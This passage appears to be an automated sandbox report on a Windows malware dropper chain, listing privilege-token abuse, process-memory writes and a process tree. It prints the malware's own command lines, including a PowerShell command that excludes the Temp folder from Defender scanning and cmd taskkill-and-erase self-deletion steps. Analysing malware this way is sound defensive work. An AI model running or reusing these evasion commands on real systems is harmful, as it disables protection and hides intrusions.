Token: SeDebugPrivilege	4728	postback.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	668	svchost.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	4484	7644867.exe
Token: SeRestorePrivilege	4956	WerFault.exe
Token: SeBackupPrivilege	4956	WerFault.exe
Token: SeBackupPrivilege	4956	WerFault.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeDebugPrivilege	4956	WerFault.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeAuditPrivilege	2448	svchost.exe
Token: SeDebugPrivilege	4132	WerFault.exe
Token: SeAuditPrivilege	2448	svchost.exe
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	4976	WerFault.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	2096	rundll32.exe
Token: SeDebugPrivilege	5080	WerFault.exe
Token: SeAssignPrimaryTokenPrivilege	2708	svchost.exe
Token: SeIncreaseQuotaPrivilege	2708	svchost.exe
Token: SeSecurityPrivilege	2708	svchost.exe
Token: SeTakeOwnershipPrivilege	2708	svchost.exe
Token: SeLoadDriverPrivilege	2708	svchost.exe
Token: SeSystemtimePrivilege	2708	svchost.exe
Token: SeBackupPrivilege	2708	svchost.exe
Token: SeRestorePrivilege	2708	svchost.exe
Token: SeShutdownPrivilege	2708	svchost.exe
Token: SeSystemEnvironmentPrivilege	2708	svchost.exe
Token: SeUndockPrivilege	2708	svchost.exe
Token: SeManageVolumePrivilege	2708	svchost.exe
Token: SeShutdownPrivilege	3016	Process not Found
Token: SeCreatePagefilePrivilege	3016	Process not Found
Token: SeDebugPrivilege	4012	rnyuf.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
6084	ultramediaburner.tmp
4240	setup_2.tmp
3016	Process not Found
3016	Process not Found
3988	installer.exe
3016	Process not Found
3016	Process not Found
4756	OneDrive.exe
3016	Process not Found
3016	Process not Found
4756	OneDrive.exe
4756	OneDrive.exe
4756	OneDrive.exe
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
7004	OneDrive.exe
3016	Process not Found
3016	Process not Found
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found

Suspicious use of SetWindowsHookEx 26 IoCs

pid	Process
3016	Process not Found
3392	cmd.exe
6284	MicrosoftEdge.exe
6240	SystemSettings.exe
6972	MicrosoftEdgeCP.exe
6972	MicrosoftEdgeCP.exe
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
3016	Process not Found
4756	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
7004	OneDrive.exe
5960	MicrosoftEdge.exe
3904	MicrosoftEdgeCP.exe
3904	MicrosoftEdgeCP.exe
4548	MicrosoftEdgeCP.exe
4548	MicrosoftEdgeCP.exe
6952	MicrosoftEdge.exe
1128	MicrosoftEdgeCP.exe
1128	MicrosoftEdgeCP.exe
1052	MicrosoftEdge.exe
6736	MicrosoftEdgeCP.exe
6736	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3016	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4060 wrote to memory of 2520	4060	setup_x86_x64_install.exe	75
PID 4060 wrote to memory of 2520	4060	setup_x86_x64_install.exe	75
PID 4060 wrote to memory of 2520	4060	setup_x86_x64_install.exe	75
PID 2520 wrote to memory of 3504	2520	setup_installer.exe	76
PID 2520 wrote to memory of 3504	2520	setup_installer.exe	76
PID 2520 wrote to memory of 3504	2520	setup_installer.exe	76
PID 3504 wrote to memory of 3716	3504	setup_install.exe	79
PID 3504 wrote to memory of 3716	3504	setup_install.exe	79
PID 3504 wrote to memory of 3716	3504	setup_install.exe	79
PID 3504 wrote to memory of 3068	3504	setup_install.exe	80
PID 3504 wrote to memory of 3068	3504	setup_install.exe	80
PID 3504 wrote to memory of 3068	3504	setup_install.exe	80
PID 3504 wrote to memory of 2788	3504	setup_install.exe	81
PID 3504 wrote to memory of 2788	3504	setup_install.exe	81
PID 3504 wrote to memory of 2788	3504	setup_install.exe	81
PID 3504 wrote to memory of 3356	3504	setup_install.exe	82
PID 3504 wrote to memory of 3356	3504	setup_install.exe	82
PID 3504 wrote to memory of 3356	3504	setup_install.exe	82
PID 3504 wrote to memory of 496	3504	setup_install.exe	83
PID 3504 wrote to memory of 496	3504	setup_install.exe	83
PID 3504 wrote to memory of 496	3504	setup_install.exe	83
PID 3504 wrote to memory of 1300	3504	setup_install.exe	84
PID 3504 wrote to memory of 1300	3504	setup_install.exe	84
PID 3504 wrote to memory of 1300	3504	setup_install.exe	84
PID 3504 wrote to memory of 3180	3504	setup_install.exe	85
PID 3504 wrote to memory of 3180	3504	setup_install.exe	85
PID 3504 wrote to memory of 3180	3504	setup_install.exe	85
PID 3504 wrote to memory of 2068	3504	setup_install.exe	86
PID 3504 wrote to memory of 2068	3504	setup_install.exe	86
PID 3504 wrote to memory of 2068	3504	setup_install.exe	86
PID 3068 wrote to memory of 3260	3068	cmd.exe	88
PID 3068 wrote to memory of 3260	3068	cmd.exe	88
PID 3068 wrote to memory of 3260	3068	cmd.exe	88
PID 3356 wrote to memory of 3640	3356	cmd.exe	87
PID 3356 wrote to memory of 3640	3356	cmd.exe	87
PID 3356 wrote to memory of 3640	3356	cmd.exe	87
PID 3716 wrote to memory of 1292	3716	cmd.exe	90
PID 3716 wrote to memory of 1292	3716	cmd.exe	90
PID 3716 wrote to memory of 1292	3716	cmd.exe	90
PID 1300 wrote to memory of 1544	1300	cmd.exe	89
PID 1300 wrote to memory of 1544	1300	cmd.exe	89
PID 1300 wrote to memory of 1544	1300	cmd.exe	89
PID 2788 wrote to memory of 1536	2788	cmd.exe	91
PID 2788 wrote to memory of 1536	2788	cmd.exe	91
PID 2788 wrote to memory of 1536	2788	cmd.exe	91
PID 496 wrote to memory of 2344	496	cmd.exe	93
PID 496 wrote to memory of 2344	496	cmd.exe	93
PID 2068 wrote to memory of 744	2068	cmd.exe	92
PID 2068 wrote to memory of 744	2068	cmd.exe	92
PID 2344 wrote to memory of 3496	2344	Fri155442fc38b.exe	95
PID 2344 wrote to memory of 3496	2344	Fri155442fc38b.exe	95
PID 2344 wrote to memory of 2520	2344	Fri155442fc38b.exe	96
PID 2344 wrote to memory of 2520	2344	Fri155442fc38b.exe	96
PID 2344 wrote to memory of 2520	2344	Fri155442fc38b.exe	96
PID 2344 wrote to memory of 2624	2344	Fri155442fc38b.exe	97
PID 2344 wrote to memory of 2624	2344	Fri155442fc38b.exe	97
PID 2344 wrote to memory of 2624	2344	Fri155442fc38b.exe	97
PID 744 wrote to memory of 1736	744	Fri1553f0ee90.exe	98
PID 744 wrote to memory of 1736	744	Fri1553f0ee90.exe	98
PID 744 wrote to memory of 1736	744	Fri1553f0ee90.exe	98
PID 1736 wrote to memory of 4124	1736	LzmwAqmV.exe	100
PID 1736 wrote to memory of 4124	1736	LzmwAqmV.exe	100
PID 1736 wrote to memory of 4184	1736	LzmwAqmV.exe	101
PID 1736 wrote to memory of 4184	1736	LzmwAqmV.exe	101

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:788
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4012
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:5440
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:5328
- C:\Users\Admin\AppData\Roaming\cfsafjc
  C:\Users\Admin\AppData\Roaming\cfsafjc
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3456
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:6060
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6252
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4804
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5336
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6988
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:1352
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6824
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:1524
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4124
- C:\Users\Admin\AppData\Roaming\cfsafjc
  C:\Users\Admin\AppData\Roaming\cfsafjc
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4728
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6784
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6532
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6364
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5816
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:904
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:2388
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5136
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:3560
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5328
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:2844
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:7044
- C:\Users\Admin\AppData\Roaming\cfsafjc
  C:\Users\Admin\AppData\Roaming\cfsafjc
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5592
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:2268
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:2456
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6780
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6380
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4608
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5156

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1004

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4060
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3716
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3068
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\Fri1544861ac3fe6a.exe
        
        Fri1544861ac3fe6a.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3260
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 764
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 788
        6⤵
        Program crash
        
        PID:5080
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 732
        6⤵
        Program crash
        
        PID:4196
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 828
        6⤵
        Program crash
        
        PID:2756
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 960
        6⤵
        Program crash
        
        PID:5300
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 988
        6⤵
        Program crash
        
        PID:5436
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1004
        6⤵
        Program crash
        
        PID:5588
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1428
        6⤵
        Program crash
        
        PID:5964
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1456
        6⤵
        Program crash
        
        PID:4652
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1688
        6⤵
        Program crash
        
        PID:2696
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1764
        6⤵
        Program crash
        
        PID:5456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1804
        6⤵
        Program crash
        
        PID:4268
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1792
        6⤵
        Program crash
        
        PID:5076
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1808
        6⤵
        Program crash
        
        PID:2460
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1852
        6⤵
        Program crash
        
        PID:1548
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2788
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\Fri156ec98815f89c.exe
        
        Fri156ec98815f89c.exe
        5⤵
        Executes dropped EXE
        
        PID:1536
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3356
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\Fri157e25afd971.exe
        
        Fri157e25afd971.exe
        5⤵
        Executes dropped EXE
        
        PID:3640
      - C:\Users\Admin\AppData\Local\Temp\is-U7BQU.tmp\Fri157e25afd971.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-U7BQU.tmp\Fri157e25afd971.tmp" /SL5="$40048,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\Fri157e25afd971.exe"
        6⤵
        Loads dropped DLL
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\is-GH2NP.tmp\zab2our.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GH2NP.tmp\zab2our.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:4360
        
        C:\Program Files\Windows Photo Viewer\THZRGZUVDR\ultramediaburner.exe
        
        "C:\Program Files\Windows Photo Viewer\THZRGZUVDR\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:6052
        
        C:\Users\Admin\AppData\Local\Temp\is-5PJ3P.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5PJ3P.tmp\ultramediaburner.tmp" /SL5="$102E0,281924,62464,C:\Program Files\Windows Photo Viewer\THZRGZUVDR\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:6084
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\90-9091c-c0d-40dbb-88395dce66e78\Nosaqivuwe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\90-9091c-c0d-40dbb-88395dce66e78\Nosaqivuwe.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:6100
        
        C:\Users\Admin\AppData\Local\Temp\2b-7f7f0-8b6-45f9d-543ce42709d75\Vaeshopegywa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2b-7f7f0-8b6-45f9d-543ce42709d75\Vaeshopegywa.exe"
        8⤵
        Executes dropped EXE
        
        PID:3680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqxswrjq.phq\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\jqxswrjq.phq\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\jqxswrjq.phq\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:1772
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jqxswrjq.phq\GcleanerEU.exe" & exit
        11⤵
        
        PID:6824
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Executes dropped EXE
        Kills process with taskkill
        
        PID:4012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v0slooqu.wo2\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\v0slooqu.wo2\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\v0slooqu.wo2\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:3988
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\v0slooqu.wo2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\v0slooqu.wo2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630539279 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:6232
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czglwmhl.dyc\anyname.exe & exit
        9⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\czglwmhl.dyc\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\czglwmhl.dyc\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:1996
        
        C:\Users\Admin\AppData\Local\Temp\czglwmhl.dyc\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\czglwmhl.dyc\anyname.exe" -u
        11⤵
        Executes dropped EXE
        
        PID:6212
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vj2tv4p2.ynp\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\vj2tv4p2.ynp\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\vj2tv4p2.ynp\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        
        PID:4196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vj2tv4p2.ynp\gcleaner.exe" & exit
        11⤵
        Loads dropped DLL
        
        PID:5744
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:1524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\axnlgqtv.mdm\autosubplayer.exe /S & exit
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:496
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\Fri155442fc38b.exe
        
        Fri155442fc38b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2344
      - C:\Users\Admin\AppData\Roaming\7217204.exe
        
        "C:\Users\Admin\AppData\Roaming\7217204.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3496
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3496 -s 1828
        7⤵
        Program crash
        
        PID:4288
      - C:\Users\Admin\AppData\Roaming\6021605.exe
        
        "C:\Users\Admin\AppData\Roaming\6021605.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2520
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:4712
      - C:\Users\Admin\AppData\Roaming\5045032.exe
        
        "C:\Users\Admin\AppData\Roaming\5045032.exe"
        6⤵
        Executes dropped EXE
        
        PID:2624
      - C:\Users\Admin\AppData\Roaming\7644867.exe
        
        "C:\Users\Admin\AppData\Roaming\7644867.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:4484
      - C:\Users\Admin\AppData\Roaming\8648482.exe
        
